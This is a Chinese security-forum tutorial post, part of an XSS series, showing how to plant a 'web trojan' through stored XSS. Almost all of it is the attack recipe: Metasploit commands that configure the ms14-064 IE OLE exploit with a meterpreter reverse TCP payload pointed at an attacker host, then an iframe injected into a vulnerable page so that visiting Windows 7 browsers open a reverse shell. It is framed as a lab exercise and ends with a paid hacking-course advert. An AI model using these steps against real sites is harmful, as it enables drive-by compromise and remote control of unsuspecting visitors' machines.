(八)XSS漏洞原理与利用_08网页挂马利用

[复制链接]
发表于 2025-11-12 19:51:58 | 显示全部楼层 |阅读模式

存储型XSS利用:网页挂马


先利用MSF生成木马,把木马链接嵌入到网页中,当用户访问该页面加载执行木马,反弹shell。利用ms14-064洞生成木马。


攻击机:kali
客户机:存在漏洞的win7
网站运行:物理机
利用kaili生成木马
开启msf: msfconsole
搜索漏洞:search ms14-064
使用攻击模块:use
exploit/windows/browser/ms14 064 ole code execution
设置允许调用powershell:set AllowPowershellPrompt true
设置服务器(kaili lP):set SRVHOST 192.168.2.188
设置调用的payload:set payloadwindows/meterpreter/reverse tcp
设置监听IP(kali lP):set LHOST 192.168.2.188
设置监听端口:set LPORT 4444
开启攻击:run 或者 exploit
生成木马: http://192.168.2.188:8080/DbvIRPd


截图202511121148543985.png



把URL地址嵌入js代码中,嵌入网页中,等待客户端访问网页!
<iframe
src="http://192.168.2.188:8080/DbvlRPd"></iframe>

截图202511121150091160.png



win7客户机使用IE浏览器访问存在xss漏洞的
页面:


截图202511121150497487.png


kali机上收到反弹的会话

截图202511121151062910.png

必火网络安全培训,北京实地培训,月月有开班,零基础入门,四个月打造渗透高手。
详情请加微信:nvhack/153-2000-4362,手机微信同号。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|小黑屋|女黑客安全网 |网站地图 | 津ICP备17008032号-3

GMT+8, 2026-2-2 05:17 , Processed in 0.081606 second(s), 26 queries .

Powered by Discuz! X3.5

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表